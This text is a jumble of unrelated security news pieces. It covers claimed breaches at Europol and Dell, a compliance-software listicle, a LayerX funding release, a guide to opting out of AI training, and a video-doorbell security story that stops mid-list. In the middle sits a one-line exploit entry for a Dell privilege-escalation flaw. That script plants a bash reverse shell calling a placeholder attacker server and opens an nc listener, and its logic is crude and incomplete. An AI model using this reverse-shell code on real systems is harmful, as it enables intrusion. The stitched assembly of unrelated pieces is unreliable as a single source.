By Waqas
Notorious hacker IntelBroker claims a major data breach at Europol. Allegedly, sensitive data including employee info, source code, and operational documents were compromised. Europol has yet to confirm the breach. Could this expose ongoing investigations and endanger law enforcement personnel? Find out more.
This is a post from HackRead.com Read the original post: Europol Hacked? IntelBroker Claims Major Law Enforcement Breach

The notorious hacker known as IntelBroker claims to have successfully breached the European Union Agency for Law Enforcement Cooperation, commonly referred to as **Europol**.

The hacker made this announcement on the infamous hacker and cybercrime platform **BreachForums**, stating that the breach occurred earlier this month and involved highly sensitive and classified information.

Initially, the hacker was offering the data for an undisclosed amount in XMR (Monero), a cryptocurrency favoured for its privacy-focused features. However, at the time of writing, Hackread.com can confirm that **IntelBroker** has revealed the data has already been sold to an anonymous buyer.

**Details of the Breach**

According to the post by IntelBroker, the breach allegedly led to the unauthorized access of a wide array of sensitive data, including:

*   **Personal Information of Alliance Employees:** Detailed personal data of individuals working within various agencies under the Europol umbrella.
*   **For Official Use Only (FOUO) Source Code:** Critical source code marked as FOUO, indicating its sensitivity and restricted nature.
*   **Operational Documents:** Including PDFs and other documents used for reconnaissance missions and operational guidelines.
*   **List of Specific Agencies Compromised:** CCSE, SIRIUS, Space – EC3, Law Enforcement Forum, Europol Platform for Experts, Cryptocurrencies – EC3.

**Implications of the Breach**

If true, the exposure of such critical data could pose a severe risk to ongoing operations and the personal security of individuals involved in these agencies. The alleged breach could also potentially undermine the integrity and security of Europol’s operations, with potential ramifications including:

*   **Operational Compromise:** The leak of operational documents and guidelines could severely hinder ongoing investigations and compromise undercover operations.
*   **Risk to Personnel:** The exposure of personal information of law enforcement officials increases the risk of identity theft, blackmail, and other forms of personal attacks.
*   **Security of Sensitive Information:** The leak of FOUO source code and strategic documents could provide malicious actors insights into law enforcement tactics and technical infrastructure.

IntelBroker on Breach Forums (Screenshot: Hackread.com)

**Europol’s Response**

Europol has yet to issue a formal statement detailing whether the breach has occurred, the extent of it, and the measures being taken to mitigate its effects. **_Hackread.com_** has reached out to Europol, and the article will be updated if the agency responds.

****IntelBroker****

Since the emergence of IntelBroker in October 2022, the hacker has conducted numerous high-profile data breaches, particularly targeting critical infrastructure in the United States. These include the following companies and organisations:

1.  **General Electric breach**
2.  **Facebook Marketplace Database**
3.  **Los Angeles International Airport**
4.  **Space-Eyes,** a Miami-based geospatial intelligence firm.
5.  **Robert Half**, a global staffing and business consulting service.
6.  **Acuity Inc.,** a US Federal contractor headquartered in Reston, Virginia.
7.  **Home Depot**, an American multinational home improvement retail corporation.
8.  **Weee! Grocery,** America’s largest online Asian supermarket, and several others.

Most recently, the hacker also **claimed to have hacked** the cybersecurity giant Zscaler and sold the stolen data and network access to an unknown buyer. However, the company denied any hack while still conducting an in-depth investigation into the claims.

_Stay Tuned!_

1.  Massive Data Breach Exposes Info of 43 Million French Workers
2.  Military Satellite Access Sold on Russian Hacker Forum for $15K
3.  FBI’s Security Platform InfraGard Hacked; 87k Members’ Data Sold
4.  After Denial, AT&T Confirms Data Breach Affecting 73 Million Users
5.  Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data

Europol Hacked? IntelBroker Claims Major Law Enforcement Breach

Dell has notified some customers about a data breach reported to include 49 million records.

Dell is warning its customers about a data breach after a cybercriminal offered a 49 million-record database of information about Dell customers on a cybercrime forum.

A cybercriminal called Menelik posted the following message on the “Breach Forums” site:

> “The data includes 49 million customer and other information of systems purchased from Dell between 2017-2024.
> 
> It is up to date information registered at Dell servers.
> 
> Feel free to contact me to discuss use cases and opportunities.
> 
> I am the only person who has the data.”

Screenshot taken from the Breach Forums

According to Menelik the data includes:

*   The full name of the buyer or company name
*   Address including postal code and country
*   Unique seven digit service tag of the system
*   Shipping date of the system
*   Warranty plan
*   Serial number
*   Dell customer number
*   Dell order number

Most of the affected systems were sold in the US, China, India, Australia, and Canada.

Users on Reddit reported getting an email from Dell which was apparently sent to customers whose information was accessed during this incident:

> “At this time, our investigation indicates limited types of customer information was accessed, including:
> 
> *   Name
> *   Physical address
> *   Dell hardware and order information, including service tag, item description, date of order and related warranty information.
> 
> The information involved does not include financial or payment information, email address, telephone number or any highly sensitive customer information.”

Although Dell might be trying to play down the seriousness of the situation by claiming that there is not a significant risk to its customers given the type of information involved, it is reassuring that there were no email addresses included. Email addresses are a unique identifier that can allow data brokers to merge and enrich their databases.

So, this is another big data breach that leaves us with more questions than answers. We have to be careful that we don’t shrug these data breaches away with comments like “they already know everything there is to know.”

This kind of information is exactly what scammers need in order to impersonate Dell support.

**Protecting yourself from a data breach**

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened, and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify any contacts using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

If you want to find out how much of your data has been exposed online, you can try our free Digital Footprint scan. Fill in the email address you’re curious about (it’s best to submit the one you most frequently use) and we’ll send you a free report.

 Dell notifies customers about data breach 

By Waqas
Dell has announced a data breach, while a hacker using the alias Menelik is selling 49 million Dell customer data on the notorious Breach Forums.
This is a post from HackRead.com Read the original post: Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data

Dell Inc., the technology giant, has notified its customers of a data breach. According to an email obtained by Hackread.com, the breach affected a Dell portal housing customers’ information and their purchase history with **Dell**.

****Details of the Breach****

Although the company did not disclose the number of affected customers, the data compromised in the incident includes:

*   **Full names**
*   **Physical address**
*   **Dell hardware and order information, including service tag, item description, date of order and related warranty information.**

Email sent by Dell to impacted customers (Screenshot credit: Hackread.com)

****Hacker Claims Responsibility****

The positive aspect is that email addresses, passwords, and banking or card data were not part of the breach. However, Hackread.com has verified that a hacker using the alias “Menelik” on **Breach Forums** has recently claimed responsibility for the breach.

It’s important to highlight that while the connection between Dell’s reported data breach and Menelik’s claim remains unconfirmed, the hacker maintains that this is indeed the same breach and has provided additional details regarding the compromised data. Specifically, Menelik alleges to have acquired the personal information of over 49 million Dell customers. This data comprises:

*   **City**
*   **Full Name**
*   **Address**
*   **Province**
*   **Postal Code**
*   **Warranty plan**
*   **Company Name**
*   **Dell Order Number**
*   **Dell Customer Number**
*   **System shipped date (order date)**
*   **Unique 7-digit service tag of the system.**

Sample data seen and analysed by Hackread.com

****Customers by Country****

Additionally, the hacker disclosed the countries with the highest number of affected Dell customers. These include:

1.  **India**
2.  **China**
3.  **Canada**
4.  **Australia**
5.  **United States**

****Dell Data Being Sold to One Buyer****

According to the hacker, the dataset consists of roughly 7 million rows of individual/personal purchase data and 11 million rows of consumer segment company data, and the rest comprises entries from enterprise clients, partners, educational institutions, and other entities. The data is currently being sold to a single buyer for an undisclosed amount.

The hacker on Breach Forums (Screenshot credit: Hackread.com)

****What Dell is Doing?****

Dell has taken several measures in response to the breach. They have notified law enforcement authorities and engaged a third-party forensic firm to investigate the incident.

Despite stating that they do not believe there is a significant risk due to the limited information compromised, the sale of data containing full names and physical addresses poses a considerable threat to customers.

This type of data exposure not only leaves individuals vulnerable to physical harm but also opens the door for threat actors to exploit the information in long-term **social engineering attacks**.

If you are among the victims of the recent Dell data breach, it’s crucial to remain alert. Hackers may use the stolen information to piece together additional details about you, including email addresses and data from previous breaches, increasing the risk of further exploitation.

1.  Acer Online Store Hacked; 34,000 Customers’ Data Stolen
2.  Critical Vulnerabilities Found in Pre-Installed Dell Software
3.  After Denial, AT&T Confirms Data Breach Affecting 73M Users
4.  Acer Data Breach: Hacker Claims to Sell 160GB of Stolen Data
5.  Trezor Data Breach Exposes Email and Names of 66,000 Users

Dell Discloses Data Breach As Hacker Sells 49 Million Customer Data

By Uzair Amir
Simplify compliance with these leading software solutions. Discover features like automated evidence collection, risk assessment, and real-time reporting. Find the perfect fit for your startup or large enterprise.
This is a post from HackRead.com Read the original post: Top 9 Compliance Automation Software in 2024

Looking to streamline your compliance processes in 2024? Many compliance automation software options can help businesses stay on top of constantly evolving data security frameworks and regulations like SOC 2, ISO 27001, HIPAA, GDPR, and PCI DSS. 

Startups and scaling companies alike are seeking tools with built-in audit capabilities and features like automated evidence collection and continuous control monitoring to significantly reduce the effort required for ensuring compliance, as these functionalities not only minimize the time and effort required for compliance but also provide a proactive approach to risk management.

When considering compliance automation software, it’s crucial to weigh key features against your organization’s specific requirements and operational needs. 

Without further ado, let’s dig deeper into the top 9 compliance automation software to choose from. 

****#1 Scytale****

Leading the charge in compliance automation, Scytale offers a comprehensive solution that combines advanced technology with excellent expert guidance. Scytale has features like automated evidence collection and continuous control monitoring and caters for over 20 frameworks. Scytale also stands out for its seamless integration capabilities, ensuring adaptability to varying business needs from startups to established companies. According to customer reviews, Scytale makes the process of getting and staying compliant significantly easier. If you’re looking for an all-in-one solution, Scytale is a top choice.

****#2 Libryo****

Libryo‘s extensive regulatory database remains a standout feature, providing users with access to a wealth of compliance information. Its structured approach to compliance management ensures that organizations can stay informed about relevant regulations. However, its lack of customization options and reliance on manual updates may limit its flexibility in rapidly evolving regulatory environments.

****#3 Predict 360****

Predict 360 distinguishes itself with its predictive analytics capabilities, empowering organizations to anticipate compliance risks and take proactive measures. Its user-friendly interface facilitates ease of use, allowing users to navigate the platform with minimal training. Nevertheless, its narrow focus on predictive modelling may overlook the broader spectrum of compliance management needs, potentially leaving gaps in coverage.

****#4 Complinity****

Complinity offers a straightforward approach to compliance management, with an emphasis on simplicity and ease of use. Its intuitive interface makes it accessible to users across different levels of expertise. However, its lack of advanced automation features and integration options may hinder its ability to meet the complex needs of larger organizations operating in highly regulated industries.

****#5 Risk Hawk****

Risk Hawk‘s strength lies in its powerful risk assessment capabilities, enabling organizations to identify and mitigate compliance risks effectively. Its comprehensive risk-scoring system provides valuable insights for decision-making. Yet, its fragmented approach to compliance management and limited automation features may impede seamless integration with existing workflows.

****#6 ZenGRC****

ZenGRC stands out for its user-friendly interface and intuitive design, making it easy for users to navigate the platform and access relevant information. Its robust reporting capabilities facilitate compliance monitoring and auditing processes. However, its limited customization options and rigid structure may restrict its adaptability to unique compliance requirements.

****#7 LogicGate****

LogicGate offers advanced workflow automation features, streamlining compliance processes and improving efficiency. Its customizable workflows empower organizations to tailor the platform to their specific needs. Nevertheless, its complex configuration requirements and steep learning curve may pose challenges for users, particularly during the initial implementation phase.

****#8 Onspring****

Onspring‘s intuitive interface and comprehensive reporting capabilities make it a popular choice for organizations seeking a user-friendly compliance automation solution. Its customizable dashboards provide real-time insights into compliance status and performance. However, its limited integration options and lack of advanced analytics may limit its suitability for organizations with complex compliance needs.

****#9 AuditBoard****

AuditBoard‘s robust audit management features enable organizations to conduct thorough audits and ensure compliance with regulatory requirements. Its centralized platform streamlines audit processes and facilitates collaboration among team members. However, its compliance automation capabilities may lag behind industry standards, particularly in terms of workflow optimization and data integration.

****Tackle Compliance with Confidence with the Right Solution** **

By now you should have a solid understanding of the top compliance automation software solutions to consider in 2024. While the list covers a diverse range of options, a few key themes emerge. Look for automation capabilities that simplify evidence collection and streamline multiple framework implementation. Compliance doesn’t have to be a pain – the right software makes it seamless. 

As you research different options, it’s important to consider your unique compliance needs and team size as part of your evaluation. Each solution should be evaluated with these considerations in mind to ensure optimal fit and functionality for your company.

And remember, don’t underestimate the value of leveraging dedicated compliance experts with technology. Leaning on dedicated compliance experts makes the compliance process a whole lot smoother, as they’re able to provide invaluable guidance and support. 

With the right solution in place, you’ll find yourself well-equipped to confront compliance challenges head-on, with confidence and efficiency. 

1.  Top Software Development Outsourcing Trends
2.  Deciphering the Economics of Software Development
3.  Technology and Software Redefine Business Operations
4.  Software Support: 7 Essential Reasons You Can’t Overlook
5.  Exploring Software Categories: From Basics to Specialized Apps
6.  Cypago Announces Automation Support for AI Security Governance

Top 9 Compliance Automation Software in 2024

By Cyber Newswire
Early adoption by Fortune 100 companies worldwide, LayerX already secures more users than any other browser security solution and enables unmatched security, performance and experience  
This is a post from HackRead.com Read the original post: LayerX Security Raises $24M for Browser Security: Empowering Secure Remote Work

LayerX, pioneer of the LayerX Browser Security platform, today announced $24 million in Series A funding led by Glilot+, the early-growth fund of Glilot Capital Partners, with participation from Dell Technologies Capital and other investors.

Lior Litwak, Managing Partner at Glilot Capital and Head of Glilot+, and Yair Snir, Managing Partner at Dell Technologies Capital, will join the LayerX board. The new capital will be used for corporate growth across talent and increasing global market presence. This round brings the company’s total investment to $32 million.

Today’s modern enterprise employees rely heavily on browser-based services and SaaS applications. Yet, these fundamental work activities expose organizations to a wide range of security risks, like data leaks, identity and password theft, malicious browser extensions, phishing sites and more. LayerX was purpose-built to secure and govern browser-based work, from both managed and unmanaged devices.

“We’ve transformed workforce protection for organizations without requiring the transition to a dedicated secure browser. Unlike other solutions, installed in a matter of minutes, the LayerX Browser Extension does not impact employee efficiency, speed, privacy or the browsing experience, ” said Or Eshed, co-founder and CEO of LayerX.

“As the browser becomes more central to the employee, we anticipate it becomes more attractive to the attacker, particularly in the wake of GenAI tools used in browser-related activities,” he continues. “Today’s funding round is a testament to our increasing market opportunity and the innovation behind our platform’s user-friendly approach to a more secure browser experience.”

LayerX’s Enterprise Browser Extension is compatible with all commonly used browsers, including Chrome, Firefox, Edge and others, without requiring agents, a VPN or network modifications. Once deployed, the information security or IT team gains visibility into user activities and can block or restrict any threat in real-time, without impacting the user experience.

LayerX protects against all threats, whether they were inadvertently or maliciously caused by the employee, or whether the attacker originated them. The solution includes an AI engine that granularly monitors the code run by the browser and automatically generates a variety of insights related to user behaviour in the browser.

“Since inception, LayerX showed super fast growth and adoption by the world’s leading enterprises. The company is at the forefront of defense for modern organizations. By protecting the browser, the central productivity application in organizations, from a wide range of new-generation security risks, LayerX can solve acute security problems that have remained unanswered until now,” said Kobi Samboursky, Founding and Managing Partner at Glilot Capital “We believe that this novel solution for securing browsers will replace most SASE and SSE solutions prevalent today in organizations. At an estimated market size of $7 billion, the potential inherent in LayerX’s technology is tremendous.”

“Similar to other successful entrepreneurs in the cybersecurity field we’ve collaborated with, Or and David bring significant experience and knowledge in understanding the technical issues involved in threats to organizations and the motivations of attackers.

Consequently, they recognize that effective security measures should adapt to real-world user behaviors, rather than the other way around,” said Yair Snir, Managing Director at Dell Technologies Capital. “In a world where most computer operations are conducted through browsers, LayerX introduces a creative approach to corporate security that is user-friendly, robust, and easily implementable in large organizations.

This approach transforms the browser from a major vulnerability to strength, facilitating secure work across devices. Our investment in LayerX isn’t just driven by the promising opportunity but also by the potential impact of the company’s solution on organizations, regardless of where employees conduct their tasks.”

****About LayerX****

LayerX was founded in 2022 by Or Eshed, CEO, and David Weisbrot, CTO, who developed web attack and defence systems during their military service. In 2017, Eshed led the exposure of the largest attack campaign in history on the Chrome browser, which involved tens of millions of compromised browsers and even led to the capture and trial of the hackers. LayerX has Fortune 100 clients worldwide.

LayerX Enterprise Browser Extension natively integrates with any browser, turning it into the most secure and manageable workspace without impacting the user experience. Enterprises use LayerX to secure their devices, identities, data, and SaaS apps from web-borne threats and browsing risks that endpoint and network solutions can’t protect against. Those include data leakage over the web, SaaS apps and GenAI Tools, malicious browser extensions, phishing, account takeovers, shadow SaaS, and more.

**Contact**

**Dori Harpaz**  
**LayerX**  
**\[email protected\]**

LayerX Security Raises $24M for Browser Security: Empowering Secure Remote Work

Some companies let you opt out of allowing your content to be used for generative AI. Here’s how to take back (at least a little) control from ChatGPT, Google’s Gemini, and more.

If you’ve ever posted something to the internet—a pithy tweet, a 2009 blog post, a scornful review, or a selfie on Instagram—it has most likely been slurped up and used to help train the current wave of generative AI. Large language models, like ChatGPT, and image creators are powered by vast reams of our data. And even if it’s not powering a chatbot, the data can be used for other machine-learning features.

Tech companies have scraped vast swathes of the web to gather the data they claim is needed to create generative AI—with little regard for content creators, copyright laws, or privacy. On top of this, increasingly, firms with reams of people’s posts are looking to get in on the AI gold rush by selling or licensing that information. Looking at you, Reddit.

However, as the lawsuits and investigations around generative AI and its opaque data practices pile up, there have been small moves to give people more control over what happens to what they post online. Some companies now let individuals and business customers opt out of having their content used in AI training or being sold for training purposes. Here’s what you can—and can’t—do.

**There’s a Limit**

Before we get to how you can opt out, it’s worth setting some expectations. Many companies building AI have already scraped the web, so anything you’ve posted is probably already in their systems. Companies are also secretive about what they have actually scraped, purchased, or used to train their systems. “We honestly don't know that much,” says Niloofar Mireshghallah, a researcher who focuses on AI privacy at the University of Washington. “In general, everything is very black-box.”

Mireshghallah explains that companies can make it complicated to opt out of having data used for AI training, and even where it is possible, many people don’t have a “clear idea” about the permissions they’ve agreed to or how data is being used. That’s before various laws, such as copyright protections and Europe’s strong privacy laws, are taken into consideration. Facebook, Google, X, and other companies have written into their privacy policies that they may use your data to train AI.

While there are various technical ways AI systems could have data removed from them or “unlearn,” Mireshghallah says, there’s very little that’s known about the processes that are in place. The options can be buried or labor-intensive. Getting posts removed from AI training data is likely to be an uphill battle. Where companies are starting to allow opt-outs for future scraping or data sharing, they are almost always making users opt-in by default.

“Most companies add the friction because they know that people aren’t going to go looking for it,” says Thorin Klosowski, a security and privacy activist at the Electronic Frontier Foundation. “Opt-in would be a purposeful action, as opposed to opting out, where you have to know it’s there.”

While less common, some companies building AI tools and machine learning models don't automatically opt-in customers. “We do not train our models on user-submitted data by default. We may use user prompts and outputs to train Claude where the user gives us express permission to do so, such as clicking a thumbs up or down signal on a specific Claude output to provide us feedback,” says Jennifer Martinez, a spokesperson for Anthropic. In this situation, the most recent iteration of the company’s Claude chatbot is built on public information online and third-party data—content people posted elsewhere online—but not user information.

The majority of this guide deals with opt-outs for text, but artists have also been using “Have I Been Trained?” to signal their images shouldn't be used for training. Run by startup Spawning, the service allows people to see if their creations have been scraped and then opt out of any future training. “Anything with a URL can be opted out. Our search engine only searches images, but our browser extension lets you opt out any media type,” says Jordan Meyer, cofounder and CEO of Spawning. Stability AI, the startup behind a text-to-image tool called Stable Diffusion, is among companies that say they are honoring the system.

The list below only includes companies currently with an opt-out process. For example, Microsoft’s Copilot does not offer users with personal accounts the option to have their prompts not used to improve the software. “A portion of the total number of user prompts in Copilot and Copilot Pro responses are used to fine-tune the experience,” says Donny Turnbaugh, a spokesperson for Copilot. “Microsoft takes steps to deidentify data before it is used, helping to protect consumer identity.” Even if the data is deidentified, privacy-minded users may want more potential control over their information.

**How to Opt Out of AI Training**

Adobe

Adobe via Matt Burgess

If you store your files in Adobe’s Creative Cloud, the company may use them to train its machine-learning algorithm. “When we analyze your content for product improvement and development purposes, we first aggregate your content with other content and then use the aggregated content to train our algorithms and thus improve our products and services,” reads the company’s FAQ. This doesn’t apply to any files stored only on your device.

If you’re using a personal Adobe account, it’s easy to opt out. Open up Adobe’s **privacy page**, scroll down to the **Content analysis** section, and click the toggle to turn it off. For business or school accounts, the opt-out process is not available on the individual level, and you’ll have to reach out to your administrator.

Amazon: AWS

AI services from Amazon Web Services, like Amazon Rekognition or Amazon CodeWhisperer, may save customer data to improve the company’s tools. Head’s up, this is the most complicated opt-out process included in the roundup, so you likely need help from an IT professional at your company or an AWS representative to perform it successfully. Outlined on this support page from Amazon, the process includes enabling the option for your organization, creating a policy, and attaching that policy where necessary.

Google: Gemini

For users of Google’s chatbot, Gemini, conversations may sometimes be selected for human review to improve the AI model. Opting out is simple, though. Open up Gemini in your browser, click on **Activity**, and select the **Turn Off** drop-down menu. Here you can just turn off the Gemini Apps Activity, or you can opt out as well as delete your conversation data. While this does mean in most cases that future chats won’t be seen for human review, already selected data is not erased through this process. According to Google’s privacy hub for Gemini, these chats may stick around for three years.

Grammarly

Grammarly does not currently offer an opt-out process for personal accounts, but self-serve business accounts can choose to opt out from having their data used to train Grammarly’s machine-learning model. Turn it off by opening up your **Account Settings**, clicking on the **Data Settings** tab, and toggling off **Product Improvement & Training**. If you have a managed business account, which includes accounts for classroom education and accounts bought through a Grammarly sales representative, you are automatically opted out from AI model training.

HubSpot

HubSpot, a popular marketing software, automatically uses data from customers to improve its machine-learning model. Unfortunately, there’s not a button to press to turn off the use of data for AI training. You have to **send an email** to privacy@hubspot.com with a message requesting that the data associated with your account be opted out.

OpenAI: ChatGPT and Dall-E

OpenAI via Matt Burgess

People reveal all sorts of personal information while using a chatbot. OpenAI provides some options for what happens to what you say to ChatGPT—including allowing its future AI models not to be trained on the content. “We give users a number of easily accessible ways to control their data, including self-service tools to access, export, and delete personal information through ChatGPT. That includes easily accessible options to opt out from the use of their content to train models,” says Taya Christianson, an OpenAI spokesperson. (The options vary slightly depending on your account type, and data from enterprise customers is not used to train models).

On its help pages, OpenAI says ChatGPT web users without accounts should navigate to **Settings** and then uncheck **Improve the model for everyone**. If you have an account and are logged in through a web browser, select **ChatGPT, Settings, Data Controls,** and then turn off **Chat History & Training**. If you’re using ChatGPT’s mobile apps, go to **Settings**, pick **Data Controls,** and turn off **Chat History & Training**. Changing these settings, OpenAI’s support pages say, won’t sync across different browsers or devices, so you need to make the change everywhere you use ChatGPT.

OpenAI is about a lot more than ChatGPT. For its Dall-E 3 image generator, the startup has a **form that allows you to send images** to be removed from “future training datasets.” It asks for your name, email, whether you own the image rights or are getting in touch on behalf of a company, details of the image, and any uploads of the image(s). OpenAI also says if you have a “high volume” of images hosted online that you want removed from training data, then it may be “more efficient” to add GPTBot to the robots.txt file of the website where the images are hosted.

Traditionally a website’s robots.txt file—a simple text file that usually sits at websitename.com/robots.txt—has been used to tell search engines, and others, whether they can include your pages in their results. It can now also be used to tell AI crawlers not to scrape what you have published—and AI companies have said they’ll honor this arrangement.

Perplexity

Perplexity is a startup that uses AI to help you search the web and find answers to questions. Like all of the other software on this list, you are automatically opted in to having your interactions and data used to train Perplexity’s AI further. Turn this off by clicking on your **account name**, scrolling down to the **Account** section, and turning off the **AI Data Retention** toggle.

Quora

Quora via Matt Burgess

Quora says it “currently” doesn’t use answers to people’s questions, posts, or comments for training AI. It also hasn’t sold any user data for AI training, a spokesperson says. However, it does offer opt-outs in case this changes in the future. To do this, visit its **Settings** page, click to **Privacy,** and turn off the “**Allow large language models to be trained on your content**” option. Despite this choice, there are some Quora posts that may be used for training LLMs. If you reply to a machine-generated answer, the company’s help pages say, then those answers may be used for AI training. It points out that third parties may just scrape its content anyway.

Rev

Rev, a voice transcription service that uses both human freelancers and AI to transcribe audio, says it uses data “perpetually” and “anonymously” to train its AI systems. Even if you delete your account, it will still train its AI on that information.

Kendell Kelton, head of brand and corporate communications at Rev, says it has the “largest and most diverse data set of voices,” made up of more than 6.5 million hours of voice recording. Kelton says Rev does not sell user data to any third parties. The firm’s terms of service say data will be used for training, and that customers are able to opt out. People can opt out of their data being used by **sending an email** to support@rev.com, its help pages say.

Slack

All of those random Slack messages at work might be used by the company to train its models as well. “Slack has used machine learning in its product for many years. This includes platform-level machine-learning models for things like channel and emoji recommendations,” says Jackie Rocca, a vice president of product at Slack who’s focused on AI.

Even though the company does not use customer data to train a large language model for its Slack AI product, Slack may use your interactions to improve the software’s machine-learning capabilities. “To develop AI/ML models, our systems analyze Customer Data (e.g. messages, content, and files) submitted to Slack,” says Slack’s privacy page. Similar to Adobe, there’s not much you can do on an individual level to opt out if you’re using an enterprise account.

The only real way to opt out is to have your administrator email Slack at feedback@slack.com. The message must have the subject line “Slack Global model opt-out request” and include your organization's URL. Slack doesn’t provide a timeline for how long the opt-out process takes, but it should send you a confirmation email after it’s complete.

Squarespace

Website-building tool Squarespace has built in a toggle to stop AI crawlers from scraping websites it hosts. This works by updating your website’s robots.txt file to tell AI companies the content is off limits. To block the AI bots, open **Settings** within your account, find **Crawlers**, and turn off **Artificial Intelligence Crawlers**. It points out this should work for the following crawlers: Anthropic, OpenAI’s GPTBot and ChatGPT-User, Google Extended, and CCBot.

Substack

If you use Substack for blog posts, newsletters, or more, the company also has an easy option to apply the robots.txt opt-out. Within your **Settings** page, scroll to the **Publication** section and turn on the toggle to **Block AI training**. Its help page points out: “This will only apply to AI tools that respect this setting.”

Tumblr

Blogging and publishing platform Tumblr—owned by Automattic, which also owns WordPress—says it is “working with” AI companies that are “interested in the very large and unique set of publicly published content” on the wider company’s platforms. This doesn’t include user emails or private content, an Automattic spokesperson says.

Tumblr has a “prevent third-party sharing” option to stop what you publish being used for AI training, as well as being shared with other third parties such as researchers. If you’re using the Tumblr app, go to account S**ettings**, select your blog, click on the **gear icon**, select **Visibility**, and toggle the “**Prevent third-party sharing**” option. Explicit posts, deleted blogs, and those that are password-protected or private, are not shared with third-party companies in any case, Tumblr’s support pages say.

WordPress

Wordpress via Matt Burgess

Like Tumblr, WordPress has a “prevent third-party sharing” option. To turn this on, visit your website’s dashboard, click on **Settings**, **General**, and then through to **Privacy**, select the **Prevent third-party sharing** box. “We are also trying to work with crawlers (like https://commoncrawl.org/) to prevent content from being scraped and sold without giving our users choice or control over how their content is used,” an Automattic spokesperson says.

Your Website

If you are hosting your own website, you can update your robots.txt file to tell AI bots not to scrape the pages. Most news websites don’t allow their articles to be crawled by AI bots. WIRED’s robots.txt file, for example, doesn’t allow bots from OpenAI, Google, Amazon, Facebook, Anthropic, or Perplexity, among others. This opt-out isn’t just for publishers though: Any website, big or small, can alter its robots file to exclude AI crawlers. All you need to do is add a disallow command; working examples can be found here.

How to Stop Your Data From Being Used to Train AI

Dell Security Management Server versions prior to 11.9.0 suffer from a local privilege escalation vulnerability.

    # Exploit Title: [title] Dell Security Management Server versions prior to11.9.0# Exploit Author: [author] Amirhossein Bahramizadeh# CVE : [if applicable] CVE-2023-32479Dell Encryption, Dell Endpoint Security Suite Enterprise, and Dell SecurityManagementServer versions prior to 11.9.0 contain privilege escalation vulnerabilitydue to improper ACL of the non-default installation directory. A localmalicious user could potentially exploit this vulnerability by replacingbinaries in installed directory and taking the reverse shell of the systemleading to Privilege Escalation.#!/bin/bashINSTALL_DIR="/opt/dell"# Check if the installed directory has improper ACLsif [ -w "$INSTALL_DIR" ]; then    # Replace a binary in the installed directory with a malicious binary that opens a reverse shell    echo "#!/bin/bash" > "$INSTALL_DIR/dell-exploit"    echo "bash -i >& /dev/tcp/your-malicious-server/1234 0>&1" >> "$INSTALL_DIR/dell-exploit"    chmod +x "$INSTALL_DIR/dell-exploit"    # Wait for the reverse shell to connect to your malicious server    nc -lvnp 1234fi

Dell Security Management Server Privilege Escalation

By Deeba Ahmed
Major Retailers Selling Video Doorbells with Serious Security Flaws, Consumer Reports Warns.
This is a post from HackRead.com Read the original post: Unsecured Video Doorbells Sold on Major Platforms: Millions at Risk of Hacking

Consumer Reports exposes security vulnerabilities in popular video doorbells allowing unauthorized access, stolen footage, and privacy risks. Learn how to protect your home from insecure devices.

The video doorbell market has been flooded with a wide variety of brands, devices, versions, and sellers, making it difficult for buyers to find safe and reliable products. To make it more complicated, according to a report by Consumer Reports (CR), these devices lack basic access controls in network traffic enabling strangers to freely access private video thumbnails.

****Investigation****

As per CR’s investigation, significant security vulnerabilities were identified in video doorbells potentially allowing attackers to gain unauthorized access to video footage, control doorbell functions, or even steal personal information.

It all started when a CR journalist received an email with grainy images of herself waving at a doorbell camera, sent by CR privacy and security test engineer Steve Blair after hacking into the doorbell from 2,923 miles away.

Screenshot credit: Consumer Reports

Blair and fellow test engineer Della Rocca probed further and discovered security flaws in cheap, insecure electronics from Chinese manufacturers sold on online marketplaces like Amazon, Walmart, Sears, and Shein. 

The doorbells lacked a visible ID issued by the Federal Communications Commission (FCC), making them illegal to be distributed in the U.S. The researchers discovered security issues in video doorbells sold under Eken and Tuck brands, with at least 10 similar devices and all analyzed doorbells being controlled through an Eken-owned mobile app, Aiwit. Two products, sold under Fishbot and Rakeblue brands, showed similar vulnerabilities. 

Eken and Tuck are strong sellers, with multiple listings on Amazon generating over 4,200 sales in January 2024 alone. The doorbells are also available on Walmart.com, sears.com, and global marketplaces Shein and Temu under different names like Andoe, Gemee, and Luckwolf.

****Potential Dangers****

Anyone with physical access can hijack the doorbell without needing advanced tools or hacking skills. They only have to download the app and pair the device to their phone to view the camera’s video feed indefinitely.

Threat actors can control doorbells to monitor family members’ movements and expose their IP addresses and WiFi network names without encryption. Poor security on company servers storing videos may further increase threats. The Aiwit smartphone app can pair doorbells with WiFi hotspots, allowing people to access video feeds without passwords or accounts. Stalkers/adversaries can identify device serial numbers and access still images from the video feed even if the original owner regains device control.

Justin Brookman, director of technology policy for CR, suggests that e-commerce platforms, particularly big names like Amazon, should take responsibility for the harm caused by their products. Eken, Tuck, Amazon, Walmart, Sears, Shein, Temu, and the Federal Trade Commission have been notified about the issues by CR.

Temu has now removed all doorbells made by Eken and its app from its website and Walmart stated items not meeting safety, reliability, and compliance standards will be removed and blocked, but CR found “similar-looking” doorbells still available on these platforms. Amazon, Sears, and Shein are yet to respond.

****How to secure your doorbell camera?****

Although, 100% security is a myth, here are some steps you can take to make sure your doorbell is protected from hackers and spying by third parties:

****Choose a Reputable Brand:****

*   Avoid unbranded or cheap video doorbells, especially those from unfamiliar manufacturers.
*   Look for established security companies or well-known brands with a history of prioritizing security.

****Check for Security Features:****

*   Make sure your doorbell uses strong encryption for video transmission and storage.
*   Look for features like two-factor authentication (2FA) for logins and activity alerts.

****Secure Your Wi-Fi Network:****

*   Use a strong password for your Wi-Fi network and enable encryption (WPA2 or WPA3).
*   Consider creating a separate guest network for devices like your doorbell, keeping it isolated from your main network with sensitive data.

****Manage App Permissions:****

